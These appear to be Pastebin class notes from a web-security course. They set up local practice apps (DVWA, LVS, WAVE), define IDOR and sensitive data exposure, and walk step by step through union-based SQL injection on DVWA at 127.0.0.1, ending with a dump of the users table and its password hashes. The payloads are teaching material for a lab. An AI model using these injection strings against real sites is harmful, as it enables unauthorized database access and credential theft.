Advertisement
_KabilaN_

Union Based Injection

Feb 8th, 2019
107
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.38 KB | None | 0 0
  1. Session 10
  2.  
  3. Setting up of LVS , WAVE and DVWA...
  4. For LVS
  5. =======
  6. Step 1 --> Extract the contents of LVS_1 in a folder
  7. Step 2 --> Copy that extracted forlder in C:\xampp\htdocs
  8. Step 3 --> STart XAMPP server --> Apache and MySQL
  9. Step 4 --> in the browser type --> 127.0.0.1/lvs_1
  10. lvs_1 --> Name of Extracted Folder
  11.  
  12.  
  13.  
  14. For WAVE
  15. ========
  16. Step 1 --> Extract the contents of wave in a folder
  17. Step 2 --> Copy that extracted forlder in C:\xampp\htdocs
  18. Step 3 --> STart XAMPP server --> Apache and MySQL
  19. Step 4 --> in the browser type --> 127.0.0.1/wave1
  20. wave1 --> Name of Extracted Folder
  21.  
  22.  
  23. For DVWA
  24. ========
  25. Step 1 --> Extract the contents of DVWA in a folder
  26. Step 2 --> Copy that extracted forlder in C:\xampp\htdocs
  27. Step 3 --> STart XAMPP server --> Apache and MySQL
  28. Step 4 --> Open configurtion file of dvwa and delete the password field value. c:/xammp/dvwa/config/config.php
  29. Step 5 --> in the browser type --> 127.0.0.1/DVWA
  30. Step 6 --> login with the credentials --> admin
  31. password
  32.  
  33.  
  34.  
  35. ============x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==========
  36.  
  37. METHODS USED IN WEB APPLICATIONS
  38. ================================
  39. 1. GET - It is the method used by web applications.In this type of request all the request made is sent in plain text i.e. the request is visible at the address bar.It is very insecure method as if one person is shoulder surfing he will be able to grasp your credential and this method is also helpful for several attacks.
  40. eg: www.aaab.com/haha.php?id=1
  41. www.adsadsa.com/index.php?happyness=null
  42.  
  43.  
  44. 2. POST - The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php
  45.  
  46. Demo...
  47.  
  48. ----------------------------------------------------------
  49.  
  50. INSECURE DIRECT OBJECT REFERENCE
  51. ================================
  52. A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
  53. Do note here that a malicious is able to access resources of another USER only. Both have the same level of access in case of IDOR.
  54.  
  55. example :
  56.  
  57. www.hungama.com/user.php?id=1
  58. www.hungama.com/user.php?id=4
  59. www.hungama.com/user.php?id=2
  60. Without proper validation it jumps you to another account.
  61.  
  62. Wave1
  63.  
  64. ----------------------------------------------------------
  65.  
  66. SENSITIVE DATA EXPOSURE
  67. =======================
  68. Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.
  69.  
  70. Types of Sensitive Data
  71. =======================
  72.  
  73. 1. Personal - Names, Address , Contact Numbers etc.
  74. 2. Confidential - ID,Passwords - Credentials, Aadhar No.
  75. 3. Financial - Bank Accounts numbers, credit cards, debit cards etc.
  76.  
  77.  
  78.  
  79. HOW A SENSITIVE DATA CAN BE COMPROMISED
  80. --------=========================--------
  81.  
  82. 1. When data is transmitted in the url, that is your credentials are transmitted via GET Parameter.
  83. username=user&password=pass&sumbit=submit
  84. 2. When data is stored in plain text form rather then hashed or encrypted form.
  85. 3. When data is stored in the text file rather then to be stored in the databsae.
  86.  
  87. Id Interest Gender Username Password
  88. -----------------------------------------------
  89. 1 Badminton Female admin Pa$$woRd
  90. 2 Football Male admin2 paSSwOrd
  91.  
  92. -----------------------------------------------------------------
  93. LVS
  94.  
  95. SQL Injections
  96. ==============
  97. Where an attacker passes the malicious SQL commands just to gain the juicy information from the database.
  98. SQLi
  99.  
  100. UNION BASED SQL INJECTION
  101. =========================
  102. Where an attacker uses the union command to collect the information and merge it into one table. He passes malicious commands and queries in the database to do so.
  103.  
  104. DEMO
  105. ====
  106. DVWA ---> Security:Low
  107. SQL Injection
  108. Step 1
  109. ======
  110. To find 'GET' parameter.
  111. something=something
  112. php?id=something
  113. php?id=cat
  114. php?id=1
  115. php?id=query
  116.  
  117. Either you click on some link of the web application|site or enter something in the search box.
  118.  
  119. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#
  120.  
  121. Step 2
  122. ======
  123. To generate a SQL error, to break the query.
  124. 1
  125. 1'
  126.  
  127. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#
  128.  
  129. You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
  130.  
  131. 'select * from table '
  132. 'select * from table' '
  133.  
  134. Step 3
  135. ======
  136. To count the number of columns, in the web application.
  137. For counting the number of columns, we will use order by
  138.  
  139. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
  140. Shows us data
  141. This query means that we are asking the database to arrange the data according to column number 1
  142.  
  143. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
  144. Shows me data
  145. This query means that we are asking the database to arrange the data according to column number 2
  146.  
  147. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
  148. Gives us an error
  149. Unknown column '3' in 'order clause'
  150. This query means that I am asking the database to arrange the data according to column number 3
  151. But there is no column number 3 --> so it will generate an error
  152.  
  153. order by n--+
  154. n starts from 1 and ends when i receive an error for the value of n
  155. --+ ---> To comment out
  156. if there is any data passed down after --+, it will not execute at all. we can also use # to comment out the rest content.
  157.  
  158. There are 2 columns, in the database.
  159.  
  160. Step 4
  161. ======
  162. To merge the data of all the columns, using UNION command.
  163. union select 1,2,...,n-1--+
  164. n=3
  165. union select 1,2--+
  166.  
  167.  
  168. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
  169.  
  170. ID: 1' union select 1,2--
  171. First name: admin
  172. Surname: admin
  173.  
  174. ID: 1' union select 1,2--
  175. First name: 1
  176. Surname: 2
  177.  
  178. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
  179.  
  180. database() --> database name
  181. version() --> Database Version Number
  182.  
  183. Step 5
  184. ======
  185. To call database ki ma --> information_schema, for getting the information about the table names
  186. Information_schema --> it is meta table --> it contains the name of tables and columns which are present in the database.
  187. information_schema.tables
  188. |-> It stores the name of all the table names in the database.
  189.  
  190. union select table_name,2 from information_schema.tables--+
  191. or
  192. union select 1,table_name from information_schema.tables--+
  193.  
  194.  
  195. We can apply both of them because both the fields are vulnerable otherwise we will go for the one which is vulnerable.
  196.  
  197. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
  198.  
  199. Step 6
  200. ======
  201. I will again call database ki maa for columns names in the table names as users
  202. information_schema
  203. information_schema.columns
  204.  
  205. union select 1,column_name from information_schema.columns where table_name="users"--+
  206.  
  207.  
  208. Step 7
  209. ======
  210. To retreive or dump data from the above info.
  211. DVWA --> Users --> (User_id,first_name,Last_name,user,Password)
  212.  
  213. union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+
  214.  
  215.  
  216.  
  217. Password is in hashed form so we will go online and check if the hash value of the value is availble or not.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement